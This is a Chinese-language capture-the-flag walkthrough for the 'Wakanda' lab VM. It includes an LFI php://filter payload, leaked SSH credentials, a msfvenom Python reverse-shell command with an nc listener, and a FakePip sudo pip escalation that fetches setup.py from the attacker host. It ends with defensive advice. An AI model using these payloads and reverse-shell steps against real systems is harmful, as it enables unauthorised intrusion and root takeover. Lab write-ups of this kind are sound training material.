Hack The Wakanda 靶机渗透测试教学文档<\/h1>

靶机概述<\/h2>
靶机名称：Wakanda<\/li>
难度等级：适中<\/li>
Flag数量：3个（flag1.txt, flag2.txt和root.txt）<\/li>
下载地址：未提供（原文中提及但未给出具体链接）<\/li> <\/ul>
渗透测试流程<\/h2>

1. 网络扫描与信息收集<\/h3>

1.1 发现目标IP<\/h4>
使用netdiscover工具扫描本地网络：<\/p>
netdiscover
<\/span><\/span><\/code><\/pre>发现靶机IP地址：192.168.1.124<\/p>
1.2 端口扫描<\/h4>
使用nmap进行全端口扫描和版本探测：<\/p>
nmap -p- -A 192.168.1.124
<\/span><\/span><\/code><\/pre>扫描结果：<\/p>

80\/tcp - HTTP服务<\/li>
111\/tcp - RPC服务<\/li>
333\/tcp - SSH服务<\/li>
48920\/tcp - RPC服务<\/li>
<\/ul>
2. Web服务枚举<\/h3>
2.1 目录爆破<\/h4>
使用dirb工具进行目录遍历：<\/p>
dirb http:\/\/192.168.1.124
<\/span><\/span><\/code><\/pre>发现目录：<\/p>

\/admin<\/li>
\/backup

（但大小显示为0，可能无实际内容）<\/li>
<\/ul>
2.2 源码分析<\/h4>
在index页面源码中发现注释：<\/p>
<!-- lang参数可用于切换语言 --><\/span>
<\/span><\/span><\/code><\/pre>测试发现可通过?lang=fr<\/code>切换为法语界面<\/p>
3. LFI漏洞利用<\/h3>
3.1 使用PHP filter协议读取文件<\/h4>
curl "http:\/\/192.168.1.124\/?lang=php:\/\/filter\/convert.base64-encode\/resource=index"<\/span>
<\/span><\/span><\/code><\/pre>获取base64编码的index.php内容，解码后发现：<\/p>

密码：Niamey4Ever227!!!<\/code><\/li>
作者用户名：mamadou<\/code><\/li>
<\/ul>
4. SSH登录<\/h3>
4.1 尝试SSH登录<\/h4>
ssh mamadou@192.168.1.124 -p 333<\/span>
<\/span><\/span><\/code><\/pre>密码：Niamey4Ever227!!!<\/code>

登录成功，进入Python命令提示符界面<\/p>
4.2 获取交互式shell<\/h4>
在Python环境中：<\/p>
import<\/span> pty
<\/span><\/span>pty.<\/span>spawn('\/bin\/bash'<\/span>)
<\/span><\/span><\/code><\/pre>成功获取bash shell<\/p>
4.3 获取第一个flag<\/h4>
cat \/home\/mamadou\/flag1.txt
<\/span><\/span><\/code><\/pre>5. 权限提升至devops用户<\/h3>
5.1 查找devops用户文件<\/h4>
find \/ -user devops 2>\/dev\/null
<\/span><\/span><\/code><\/pre>发现文件：\/srv\/.antivirus.py<\/code><\/p>
5.2 分析antivirus.py<\/h4>
文件内容为向\/tmp\/test写入"test"字符串<\/p>
5.3 利用antivirus.py获取反向shell<\/h4>
生成Python反向shell payload：<\/p>
msfvenom -p cmd\/unix\/reverse_python lhost=<\/span>192.168.1.134 lport=<\/span>4444<\/span> R
<\/span><\/span><\/code><\/pre>修改antivirus.py，替换原有代码为payload（去掉"python -c"部分）<\/p>
5.4 设置监听<\/h4>
nc -lvnp 4444<\/span>
<\/span><\/span><\/code><\/pre>等待脚本执行，获取devops用户shell<\/p>
5.5 获取第二个flag<\/h4>
cat \/home\/devops\/flag2.txt
<\/span><\/span><\/code><\/pre>6. 权限提升至root<\/h3>
6.1 检查sudo权限<\/h4>
sudo -l
<\/span><\/span><\/code><\/pre>发现可以以root身份执行pip命令<\/p>
6.2 利用FakePip提权<\/h4>

下载FakePip利用脚本：<\/li>
<\/ol>
git clone https:\/\/github.com\/0x00-0x00\/FakePip.git
<\/span><\/span><\/code><\/pre>
修改setup.py中的os.system函数内容（替换为base64编码的反向shell命令）<\/li>
本地启动HTTP服务：<\/li>
<\/ol>
python -m SimpleHTTPServer 80<\/span>
<\/span><\/span><\/code><\/pre>
靶机下载并执行：<\/li>
<\/ol>
wget http:\/\/192.168.1.134\/setup.py
<\/span><\/span>sudo pip install . --upgrade --force-install
<\/span><\/span><\/code><\/pre>
获取root shell<\/li>
<\/ol>
6.3 获取root flag<\/h4>
cat \/root\/root.txt
<\/span><\/span><\/code><\/pre>关键知识点总结<\/h2>

信息收集<\/strong>：使用netdiscover和nmap进行网络扫描和端口探测<\/li>
Web目录爆破<\/strong>：dirb工具的使用<\/li>
LFI漏洞利用<\/strong>：PHP filter协议读取文件源码<\/li>
凭证发现<\/strong>：从源码中提取用户名和密码<\/li>
SSH登录<\/strong>：使用发现的凭证进行登录<\/li>
Python环境逃逸<\/strong>：使用pty模块获取交互式shell<\/li>
横向移动<\/strong>：通过查找特定用户文件寻找提权路径<\/li>
恶意脚本利用<\/strong>：修改antivirus.py获取反向shell<\/li>
sudo提权<\/strong>：利用pip的sudo权限和FakePip漏洞获取root权限<\/li>
<\/ol>
防御建议<\/h2>

限制PHP功能<\/strong>：禁用危险的PHP协议如php:\/\/filter<\/li>
敏感信息保护<\/strong>：避免在源码中硬编码凭证<\/li>
权限最小化<\/strong>：限制用户sudo权限，避免给pip等包管理器root权限<\/li>
文件权限控制<\/strong>：限制用户对系统关键文件的访问权限<\/li>
输入验证<\/strong>：对lang参数进行严格过滤，防止LFI漏洞<\/li>
日志监控<\/strong>：监控异常的文件访问和修改行为<\/li>
<\/ol>